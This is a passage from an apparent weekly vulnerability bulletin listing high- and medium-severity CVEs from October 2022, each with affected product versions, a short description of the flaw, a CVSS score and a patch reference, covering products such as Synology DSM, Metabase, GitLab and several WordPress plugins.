sony — content_transfer Untrusted search path vulnerability in the installer of Content Transfer (for Windows) Ver.1.3 and prior allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2022-10-24 7.8 CVE-2022-41796
MISC
MISC
st — stm32_mw_usb_host A buffer overflow vulnerability in stm32_mw_usb_host of STMicroelectronics allows an attacker to execute arbitrary code when the descriptor contains more endpoints than USBH_MAX_NUM_ENDPOINTS. The library is typically integrated when using a RTOS such as FreeRTOS on STM32 MCUs. 2022-10-21 9.8 CVE-2021-42553
CONFIRM
synology — diskstation_manager Missing authentication for critical function vulnerability in iSCSI management functionality in Synology DiskStation Manager (DSM) before 7.1-42661 allows remote attackers to read or write arbitrary files via unspecified vectors. 2022-10-25 9.1 CVE-2022-27623
CONFIRM
synology — presto_file_server Improper privilege management vulnerability in summary report management in Synology Presto File Server before 2.1.2-1601 allows remote authenticated users to bypass security constraint via unspecified vectors. 2022-10-26 8.8 CVE-2022-43749
CONFIRM
synology — presto_file_server Improper limitation of a pathname to a restricted directory (‘Path Traversal’) vulnerability in file operation management in Synology Presto File Server before 2.1.2-1601 allows remote attackers to write arbitrary files via unspecified vectors. 2022-10-26 7.5 CVE-2022-43748
CONFIRM
tenda — ax1803_firmware Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow vulnerability in the GetParentControlInfo function, which can cause a denial of service attack through a carefully constructed http request. 2022-10-27 7.5 CVE-2022-40874
MISC
tenda — ax1803_firmware Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow in the function GetParentControlInfo. 2022-10-27 7.5 CVE-2022-40875
MISC
uatech — badaso Badaso version 2.6.0 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application does not properly validate the data uploaded by users. 2022-10-25 9.8 CVE-2022-41711
MISC
MISC
vestacp — control_panel myVesta Control Panel before 0.9.8-26-43 and Vesta Control Panel before 0.9.8-26 are vulnerable to command injection. An authenticated and remote administrative user can execute arbitrary commands via the v_sftp_license parameter when sending HTTP POST requests to the /edit/server endpoint. 2022-10-24 7.2 CVE-2021-46850
MISC
MISC
MISC
MISC
MISC
vim — vim A vulnerability was found in vim and classified as problematic. Affected by this issue is the function qf_update_buffer of the file quickfix.c of the component autocmd Handler. The manipulation leads to use after free. The attack may be launched remotely. Upgrading to version 9.0.0805 is able to address this issue. The name of the patch is d0fab10ed2a86698937e3c3fed2f10bd9bb5e731. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-212324. 2022-10-26 7.5 CVE-2022-3705
MISC
MISC
webmin — usermin Usermin through 1.850 allows a remote authenticated user to execute OS commands via command injection in a filename for the GPG module. 2022-10-25 8.8 CVE-2022-35132
MISC
MISC
wintercms — winter Winter is a free, open-source content management system based on the Laravel PHP framework. The Snowboard framework in versions 1.1.8, 1.1.9, and 1.2.0 is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. The 1.0 branch of Winter is not affected, as it does not contain the Snowboard framework. This issue has been patched in v1.1.10 and v1.2.1. As a workaround, one may avoid this issue by following some common security practices for JavaScript, including implementing a content security policy and auditing scripts. 2022-10-26 9.8 CVE-2022-39357
MISC
MISC
MISC
CONFIRM
MISC
yokogawa — wtviewerefree Stack-based buffer overflow in WTViewerE series WTViewerE 761941 from 1.31 to 1.61 and WTViewerEfree from 1.01 to 1.52 allows an attacker to cause the product to crash by processing a long file name. 2022-10-24 9.8 CVE-2022-40984
MISC
MISC
yordam — library_automation_system Yordam Library Information Document Automation product before version 19.02 has an unauthenticated Information disclosure vulnerability. 2022-10-27 7.5 CVE-2021-45475
CONFIRM
zalando — skipper Zalando Skipper v0.13.236 is vulnerable to Server-Side Request Forgery (SSRF). 2022-10-25 9.8 CVE-2022-38580
MISC
MISC
MISC
MISC


Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adenion — blog2social The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.9.10 does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscribers, could perform SSRF attacks. 2022-10-25 6.5 CVE-2022-3247
CONFIRM
adminpad_project — adminpad The AdminPad WordPress plugin before 2.2 does not have a CSRF check when updating admin’s note, allowing attackers to make a logged in admin update their notes via a CSRF attack. 2022-10-25 6.5 CVE-2022-2762
MISC
advantech — r-seenet Advantech R-SeeNet Versions 2.4.19 and prior are vulnerable to path traversal attacks. An unauthorized attacker could remotely exploit vulnerable PHP code to delete .PDF files. 2022-10-27 5.3 CVE-2022-3387
MISC
algosec — fireflow AlgoSec – FireFlow Reflected Cross-Site-Scripting (RXSS). A malicious user injects JavaScript code into a parameter called IntersectudRule on the search/result.html page. The malicious user changes the request from POST to GET and sends the URL to another user (victim). JavaScript code is executed on the browser of the other user. 2022-10-25 5.4 CVE-2022-36783
MISC
alivecor — kardia CWE-302 Authentication Bypass by Assumed-Immutable Data in AliveCor Kardia App version 5.17.1-754993421 and prior on Android allows an unauthenticated attacker with physical access to the Android device containing the app to bypass application authentication and alter information in the app. 2022-10-26 6.1 CVE-2022-40703
MISC
apache — geode Apache Geode versions up to 1.15.0 are vulnerable to a Cross-Site Scripting (XSS) via data injection when using Pulse web application to view Region entries. 2022-10-25 5.4 CVE-2022-34870
MISC
MLIST
axiosys — bento4 A vulnerability was found in Axiomatic Bento4. It has been rated as problematic. This issue affects the function AP4_StsdAtom of the file Ap4StsdAtom.cpp of the component MP4fragment. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212003. 2022-10-26 5.5 CVE-2022-3663
MISC
MISC
MISC
axiosys — bento4 A vulnerability has been found in Axiomatic Bento4 and classified as problematic. This vulnerability affects the function AP4_AtomFactory::CreateAtomFromStream of the component mp4edit. The manipulation leads to memory leak. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212008. 2022-10-26 5.5 CVE-2022-3668
MISC
MISC
MISC
axiosys — bento4 A vulnerability was found in Axiomatic Bento4 and classified as problematic. This issue affects the function AP4_AvccAtom::Create of the component mp4edit. The manipulation leads to memory leak. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212009 was assigned to this vulnerability. 2022-10-26 5.5 CVE-2022-3669
MISC
MISC
MISC
bookstackapp — bookstack Cross-site scripting vulnerability in BookStack versions prior to v22.09 allows a remote authenticated attacker to inject an arbitrary script. 2022-10-24 5.4 CVE-2022-40690
MISC
MISC
MISC
bricksbuilder — bricks The Bricks theme for WordPress is vulnerable to authorization bypass due to a missing capability check on the bricks_save_post AJAX action in versions 1.0 to 1.5.3. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to edit any page, post, or template on the vulnerable WordPress website. 2022-10-28 6.5 CVE-2022-3400
MISC
MISC
broadcom — fabric_operating_system Brocade Fabric OS Web Application services before Brocade Fabric v9.1.0, v9.0.1e, v8.2.3c, v7.4.2j store server and user passwords in the debug statements. This could allow a local user to extract the passwords from a debug file. 2022-10-25 6.5 CVE-2022-28170
MISC
broadcom — fabric_operating_system A vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5 could allow a local authenticated attacker to export out sensitive files with “seccryptocfg”, “configupload”. 2022-10-25 5.5 CVE-2022-33180
MISC
broadcom — fabric_operating_system An information disclosure vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, 7.4.2.j could allow a local authenticated attacker to read sensitive files using switch commands “configshow” and “supportlink”. 2022-10-25 5.5 CVE-2022-33181
MISC
cisco — identity_services_engine A vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by persuading an authenticated administrator of the web-based management interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. 2022-10-26 5.4 CVE-2022-20959
CISCO
dell — emc_isilon_onefs The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended. 2022-10-21 4.3 CVE-2020-5355
CONFIRM
dell — emc_powerscale_onefs Dell PowerScale OneFS, versions 8.2.2-9.3.0, contain an OS command injection vulnerability. A privileged local malicious user could potentially exploit this vulnerability, leading to a full system compromise. This impacts compliance mode clusters. 2022-10-21 6.7 CVE-2022-34437
CONFIRM
dell — emc_powerscale_onefs Dell PowerScale OneFS, versions 8.2.x-9.4.0.x, contain a privilege context switching error. A local authenticated malicious user with high privileges could potentially exploit this vulnerability, leading to full system compromise. This impacts compliance mode clusters. 2022-10-21 6.7 CVE-2022-34438
CONFIRM
dell — emc_powerscale_onefs Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, and 9.3.0.6, contain a sensitive data in log files vulnerability. A privileged local user may potentially exploit this vulnerability, leading to disclosure of this sensitive data. 2022-10-21 4.4 CVE-2022-31239
CONFIRM
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the PostEnergyType API. 2022-10-27 5.4 CVE-2022-40965
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the PutLineMessageSetting API. 2022-10-27 5.4 CVE-2022-41555
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the SetPF API. 2022-10-27 5.4 CVE-2022-41651
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the PutShift API. 2022-10-27 5.4 CVE-2022-41701
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a stored cross-site scripting vulnerability through the InsertReg API. 2022-10-27 5.4 CVE-2022-41702
MISC
eclipse — openj9 In Eclipse Openj9 before version 0.35.0, interface calls can be inlined without a runtime type check. Malicious bytecode could make use of this inlining to access or modify memory via an incompatible type. 2022-10-24 6.5 CVE-2022-3676
CONFIRM
CONFIRM
CONFIRM
employee_record_management_system_project — employee_record_management_system Employee Record Management System v 1.2 is vulnerable to Cross Site Scripting (XSS) via editempprofile.php. 2022-10-28 5.4 CVE-2021-37781
MISC
MISC
esri — arcgis_server There is a reflected cross site scripting issue in Esri ArcGIS Server versions 10.9.1 and below which may allow a remote unauthorized attacker to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the victim’s browser. 2022-10-25 6.1 CVE-2022-38195
CONFIRM
esri — arcgis_server There is a reflected cross site scripting issue in the Esri ArcGIS Server services directory versions 10.9.1 and below that may allow a remote, unauthenticated attacker to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the victim’s browser. 2022-10-25 6.1 CVE-2022-38198
CONFIRM
esri — arcgis_server A remote file download issue can occur in some capabilities of Esri ArcGIS Server web services that may in some edge cases allow a remote, unauthenticated attacker to induce an unsuspecting victim to launch a process in the victim’s PATH environment. Current browsers provide users with warnings against running unsigned executables downloaded from the internet. 2022-10-25 6.1 CVE-2022-38199
CONFIRM
exiv2 — exiv2 A vulnerability, which was classified as problematic, was found in Exiv2. This affects the function QuickTimeVideo::decodeBlock of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to null pointer dereference. It is possible to initiate the attack remotely. The name of the patch is 459910c36a21369c09b75bcfa82f287c9da56abf. It is recommended to apply a patch to fix this issue. The identifier VDB-212349 was assigned to this vulnerability. 2022-10-27 6.5 CVE-2022-3718
MISC
MISC
MISC
expresstech — quiz_and_survey_master Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin <= 7.3.4 on WordPress. 2022-10-28 5.4 CVE-2021-36863
CONFIRM
CONFIRM
fluxcd — source-controller Flux is an open and extensible continuous delivery solution for Kubernetes. Versions prior to 0.35.0 are subject to a Denial of Service. Users that have permissions to change Flux’s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), causing the entire object type to stop being processed. This issue is patched in version 0.35.0. As a workaround, Admission controllers can be employed to restrict the values that can be used for fields `.spec.interval` and `.spec.timeout`, however upgrading to the latest versions is still the recommended mitigation. 2022-10-22 4.3 CVE-2022-39272
CONFIRM
MISC
free5gc — free5gc In free5GC 3.2.1, a malformed NGAP message can crash the AMF and NGAP decoders via an index-out-of-range panic in aper.GetBitString. 2022-10-24 5.5 CVE-2022-43677
MISC
genivi — diagnostic_log_and_trace An issue was discovered in Connected Vehicle Systems Alliance (COVESA) dlt-daemon through 2.18.8. Due to a faulty DLT file parser, a crafted DLT file that crashes the process can be created. This is due to missing validation checks. There is a heap-based buffer over-read of one byte. 2022-10-25 5.5 CVE-2022-39836
MISC
MISC
genivi — diagnostic_log_and_trace An issue was discovered in Connected Vehicle Systems Alliance (COVESA) dlt-daemon through 2.18.8. Due to a faulty DLT file parser, a crafted DLT file that crashes the process can be created. This is due to missing validation checks. There is a NULL pointer dereference. 2022-10-25 5.5 CVE-2022-39837
MISC
MISC
getkirby — kirby Kirby is a Content Management System. Prior to versions 3.5.8.2, 3.6.6.2, 3.7.5.1, and 3.8.1, a user enumeration vulnerability affects all Kirby sites with user accounts unless Kirby’s API and Panel are disabled in the config. It can only be exploited for targeted attacks because the attack does not scale to brute force. The problem has been patched in Kirby 3.5.8.2, Kirby 3.6.6.2, Kirby 3.7.5.1, and Kirby 3.8.1. In all of the mentioned releases, the maintainers have rewritten the affected code so that the delay is also inserted after the brute force limit is reached. 2022-10-25 5.3 CVE-2022-39315
CONFIRM
MISC
MISC
MISC
MISC
gitlab — gitlab An information disclosure vulnerability in GitLab CE/EE affecting all versions starting from 9.3 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1 allows a project maintainer to access the DataDog integration API key from webhook logs. 2022-10-28 4.9 CVE-2022-3018
MISC
CONFIRM
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.6 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. A malicious maintainer could exfiltrate a GitHub integration’s access token by modifying the integration URL such that authenticated requests are sent to an attacker controlled server. 2022-10-28 4.3 CVE-2022-2882
MISC
MISC
CONFIRM
goabode — iota_all-in-one_security_kit_firmware A double-free vulnerability exists in the web interface /action/ipcamSetParamPost functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to memory corruption. An attacker can make an authenticated HTTP request to trigger this vulnerability. 2022-10-25 6.5 CVE-2022-32574
MISC
google — bazel Bad credential handling in the remote assets API for Bazel versions prior to 5.3.2 and 4.2.3 sends all user-provided credentials instead of only the required ones for the requests. We recommend upgrading to versions later than or equal to 5.3.2 or 4.2.3. 2022-10-26 4.3 CVE-2022-3474
CONFIRM
hospital_management_system_project — hospital_management_system Hospital Management System v 4.0 is vulnerable to Cross Site Scripting (XSS) via /hospital/hms/admin/patient-search.php. 2022-10-28 5.4 CVE-2021-35388
MISC
MISC
ipfire — ipfire Multiple stored cross-site scripting vulnerabilities in the web user interface of IPFire versions prior to 2.27 allow a remote authenticated attacker with administrative privilege to inject an arbitrary script. 2022-10-24 4.8 CVE-2022-36368
MISC
MISC
MISC
MISC
jadx_project — jadx jadx is a set of command line and GUI tools for producing Java source code from Android Dex and Apk files. Versions prior to 1.4.5 are subject to a Denial of Service when opening zip files with HTML sequences. This issue has been patched in version 1.4.5. There are no known workarounds. 2022-10-21 5.5 CVE-2022-39259
CONFIRM
joomla — joomla! An issue was discovered in Joomla! 4.2.0 through 4.2.3. Inadequate filtering of potentially malicious user input leads to reflected XSS vulnerabilities in various components. 2022-10-25 6.1 CVE-2022-27913
MISC
joomla — joomla! An issue was discovered in Joomla! 4.0.0 through 4.2.3. Sites with publicly enabled debug mode exposed data of previous requests. 2022-10-25 5.3 CVE-2022-27912
MISC
juiker — juiker Juiker app hard-coded its AES key in the source code. A physical attacker, after getting the Android root privilege, can use the AES key to decrypt users’ ciphertext and tamper with it. 2022-10-24 6.1 CVE-2022-38117
MISC
lannerinc — iac-ast2500a_firmware A broken access control vulnerability in the First_network_func function of spx_restservice allows an attacker to arbitrarily change the network configuration of the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 5.3 CVE-2021-26732
MISC
MISC
lannerinc — iac-ast2500a_firmware A broken access control vulnerability in the SubNet_handler_func function of spx_restservice allows an attacker to arbitrarily change the security access rights to KVM and Virtual Media functionalities. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 5.3 CVE-2021-44776
MISC
MISC
lannerinc — iac-ast2500a_firmware Observable discrepancies in the login process allow an attacker to guess legitimate user names registered in the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. 2022-10-24 5.3 CVE-2021-45925
MISC
MISC
laubrotel — lbstopattack The LBStopAttack WordPress plugin through 1.1.2 does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin’s protections. 2022-10-25 6.5 CVE-2022-3097
MISC
lemon8_project — lemon8 Improper authorization in handler for custom URL scheme vulnerability in Lemon8 App for Android versions prior to 3.3.5 and Lemon8 App for iOS versions prior to 3.3.5 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack. 2022-10-24 6.5 CVE-2022-41797
MISC
MISC
MISC
linux — linux_kernel A flaw was found in the KVM’s AMD nested virtualization (SVM). A malicious L1 guest could purposely fail to intercept the shutdown of a cooperative nested guest (L2), possibly leading to a page fault and kernel panic in the host (L0). 2022-10-25 5.5 CVE-2022-3344
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects some unknown processing of the file fs/fscache/cookie.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211931. 2022-10-21 5.5 CVE-2022-3630
N/A
N/A
linux — linux_kernel A vulnerability classified as problematic has been found in Linux Kernel. This affects the function rtl8188f_spur_calibration of the file drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c of the component Wireless. The manipulation of the argument hw_ctrl_s1/sw_ctrl_s1 leads to use of uninitialized variable. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211959. 2022-10-21 5.5 CVE-2022-3642
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability. 2022-10-21 5.3 CVE-2022-3646
N/A
N/A
litespeedtech — openlitespeed Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1 2022-10-27 5.8 CVE-2022-0072
MISC
MISC
metabase — metabase Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, and 1.42.6, it was possible to circumvent locked parameters when requesting data for a question in an embedded dashboard by constructing a malicious request to the backend. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, and 1.42.6. 2022-10-26 6.5 CVE-2022-39358
CONFIRM
metabase — metabase Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9, the custom GeoJSON map URL address would follow redirects to addresses that were otherwise disallowed, like link-local or private-network. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase no longer follows redirects on GeoJSON map URLs. An environment variable `MB_CUSTOM_GEOJSON_ENABLED` was also added to disable custom GeoJSON completely (`true` by default). 2022-10-26 6.5 CVE-2022-39359
CONFIRM
MISC
metabase — metabase Metabase is data visualization software. Prior to versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9 single sign on (SSO) users were able to do password resets on Metabase, which could allow a user access without going through the SSO IdP. This issue is patched in versions 0.44.5, 1.44.5, 0.43.7, 1.43.7, 0.42.6, 1.42.6, 0.41.9, and 1.41.9. Metabase now blocks password reset for all users who use SSO for their Metabase login. 2022-10-26 6.5 CVE-2022-39360
MISC
CONFIRM
metabase — metabase The url parameter of the /api/geojson endpoint in Metabase versions <44.5 can be used to perform Server Side Request Forgery attacks. Previously implemented blacklists could be circumvented by leveraging 301 and 302 redirects. 2022-10-26 6.5 CVE-2022-43776
MISC
mitel — micollab A vulnerability in the MiCollab Client API of Mitel MiCollab through 9.5.0.101 could allow an authenticated attacker to modify their profile parameters due to improper authorization controls. A successful exploit could allow the authenticated attacker to impersonate another user’s name. 2022-10-25 6.5 CVE-2022-36454
MISC
MISC
octopus — octopus_server In affected versions of Octopus Server it is possible to reveal the existence of resources in a space that the user does not have access to due to verbose error messaging. 2022-10-27 5.3 CVE-2022-2508
MISC
online_medicine_ordering_system_project — online_medicine_ordering_system A vulnerability classified as problematic was found in SourceCodester Online Medicine Ordering System 1.0. Affected by this vulnerability is an unknown functionality of the file /omos/admin/?page=user/list. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-212347. 2022-10-27 5.4 CVE-2022-3716
MISC
open-xchange — ox_app_suite OX App Suite through 8.2 allows XSS via an attachment or OX Drive content when a client uses the len or off parameter. 2022-10-25 6.1 CVE-2022-31468
MISC
openfga — openfga OpenFGA is an authorization/permission engine. Prior to version 0.2.4, the `streamed-list-objects` endpoint was not validating the authorization header, resulting in disclosure of objects in the store. Users of `openfga/openfga` versions 0.2.3 and prior who are exposing the OpenFGA service to the internet are vulnerable. Version 0.2.4 contains a patch for this issue. 2022-10-25 5.3 CVE-2022-39340
CONFIRM
MISC
MISC
owasp — dependency-track Dependency-Track is a Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Prior to version 4.6.0, performing an API request using a valid API key with insufficient permissions causes the API key to be written to Dependency-Track’s audit log in clear text. Actors with access to the audit log can exploit this flaw to gain access to valid API keys. The issue has been fixed in Dependency-Track 4.6.0. Instead of logging the entire API key, only the last 4 characters of the key will be logged. It is strongly recommended to check historic logs for occurrences of this behavior, and re-generating API keys in case of leakage. 2022-10-25 4.4 CVE-2022-39351
MISC
CONFIRM
MISC
owasp — dependency-track_frontend @dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Due to the common practice of providing vulnerability details in markdown format, the Dependency-Track frontend renders them using the JavaScript library Showdown. Showdown does not have any XSS countermeasures built in, and versions before 4.6.1 of the Dependency-Track frontend did not encode or sanitize Showdown’s output. This made it possible for arbitrary JavaScript included in vulnerability details via HTML attributes to be executed in context of the frontend. Actors with the `VULNERABILITY_MANAGEMENT` permission can exploit this weakness by creating or editing a custom vulnerability and providing XSS payloads in any of the following fields: Description, Details, Recommendation, or References. The payload will be executed for users with the `VIEW_PORTFOLIO` permission when browsing to the modified vulnerability’s page. Alternatively, malicious JavaScript could be introduced via any of the vulnerability databases mirrored by Dependency-Track. However, this attack vector is highly unlikely, and the maintainers of Dependency-Track are not aware of any occurrence of this happening. Note that the `Vulnerability Details` element of the `Audit Vulnerabilities` tab in the project view is not affected. The issue has been fixed in frontend version 4.6.1. 2022-10-25 5.4 CVE-2022-39350
CONFIRM
MISC
MISC
paessler — prtg_network_monitor PRTG Network Monitor through 22.2.77.2204 does not prevent custom input for a device’s icon, which can be modified to insert arbitrary content into the style tag for that device. When the device page loads, the arbitrary Cascading Style Sheets (CSS) data is inserted into the style tag, loading malicious content. Because PRTG Network Monitor prevents `"` characters and modern browsers disable JavaScript support in style tags, this vulnerability could not be escalated into a Cross-Site Scripting vulnerability. 2022-10-25 5.3 CVE-2022-35739
MISC
MISC
password_storage_application_project — password_storage_application Password Storage Application v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Setup page. 2022-10-27 5.4 CVE-2022-42993
MISC
MISC
MISC
pulpproject — pulp_ansible The collection remote for pulp_ansible stores tokens in plaintext instead of using pulp’s encrypted field and exposes them in read/write mode via the API () instead of marking it as write only. 2022-10-25 5.5 CVE-2022-3644
MISC
retain — retain_live_chat The Retain Live Chat WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-25 4.8 CVE-2022-3391
CONFIRM
rubyonrails — rails A vulnerability classified as problematic has been found in Ruby on Rails. This affects an unknown part of the file actionpack/lib/action_dispatch/middleware/templates/routes/_table.html.erb. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is be177e4566747b73ff63fd5f529fab564e475ed4. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212319. 2022-10-26 5.4 CVE-2022-3704
MISC
MISC
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add”. 2022-10-28 5.4 CVE-2022-43164
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking “Create”. 2022-10-28 5.4 CVE-2022-43165
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking “Add New Entity”. 2022-10-28 5.4 CVE-2022-43166
MISC
sanitization_management_system_project — sanitization_management_system A vulnerability, which was classified as problematic, has been found in SourceCodester Sanitization Management System 1.0. This issue affects some unknown processing of the file /php-sms/classes/SystemSettings.php. The manipulation of the argument name/shortname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-212015. 2022-10-26 6.1 CVE-2022-3672
N/A
sanitization_management_system_project — sanitization_management_system A vulnerability, which was classified as problematic, was found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the file /php-sms/classes/Master.php. The manipulation of the argument message leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-212016. 2022-10-26 6.1 CVE-2022-3673
N/A
sem-cms — semcms SEMCMS SHOP v 1.1 is vulnerable to Cross Site Scripting (XSS) via Ant_M_Coup.php. 2022-10-28 6.1 CVE-2021-38728
MISC
MISC
simple_online_public_access_catalog_project — simple_online_public_access_catalog A stored cross-site scripting (XSS) vulnerability in Simple Online Public Access Catalog v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Account Full Name field. 2022-10-27 5.4 CVE-2022-42991
MISC
MISC
MISC
softr — softr Softr v2.0 was discovered to contain a Cross-Site Scripting (XSS) vulnerability via the First Name parameter under the Create A New Account module. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload. 2022-10-27 6.1 CVE-2022-32407
MISC
MISC
synology — diskstation_manager Server-Side Request Forgery (SSRF) vulnerability in Package Center functionality in Synology DiskStation Manager (DSM) before 7.1-42661 allows remote authenticated users to access intranet resources via unspecified vectors. 2022-10-25 4.3 CVE-2022-27622
CONFIRM
tasks — tasks The Tasks.org Android app is an open-source app for to-do lists and reminders. The Tasks.org app uses the activity `ShareLinkActivity.kt` to handle “share” intents coming from other components in the same device and convert them to tasks. Those intents may contain arbitrary file paths as attachments, in which case the files pointed by those paths are copied in the app’s external storage directory. Prior to versions 12.7.1 and 13.0.1, those paths were not validated, allowing a malicious or compromised application in the same device to force Tasks.org to copy files from its internal storage to its external storage directory, where they became accessible to any component with permission to read the external storage. This vulnerability can lead to sensitive information disclosure. All information in the user’s notes and the app’s preferences, including the encrypted credentials of CalDav integrations if enabled, could be accessed by third party applications installed on the same device. This issue was fixed in versions 12.7.1 and 13.0.1. There are no known workarounds. 2022-10-25 5.5 CVE-2022-39349
CONFIRM
MISC
tech-banker — contact_bank The Contact Bank WordPress plugin through 3.0.30 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-25 4.8 CVE-2022-3350
MISC
tenable — nessus An authenticated attacker could read Nessus Debug Log file attachments from the web UI without having the correct privileges to do so. This may lead to the disclosure of information on the scan target and/or the Nessus scan to unauthorized parties able to reach the Nessus instance. 2022-10-25 6.5 CVE-2022-33757
MISC
themepoints — testimonials Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Themepoints Testimonials plugin <= 2.6 on WordPress. 2022-10-28 4.8 CVE-2021-36858
CONFIRM
CONFIRM
train_scheduler_app_project — train_scheduler_app Multiple stored cross-site scripting (XSS) vulnerabilities in Train Scheduler App v1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Train Code, Train Name, and Destination text fields. 2022-10-27 5.4 CVE-2022-42992
MISC
MISC
MISC
